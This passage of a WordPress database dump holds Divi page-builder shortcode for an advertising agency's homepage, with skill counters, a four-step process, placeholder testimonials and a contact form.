button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Advertising agency in delhi\" title_text=\"Advertising agency in delhi\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy for success\" title_text=\"marketing strategy for success\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 16:40:32','2020-08-07 16:40:32','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(501,1,'2020-08-07 16:42:09','2020-08-07 16:42:09','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" 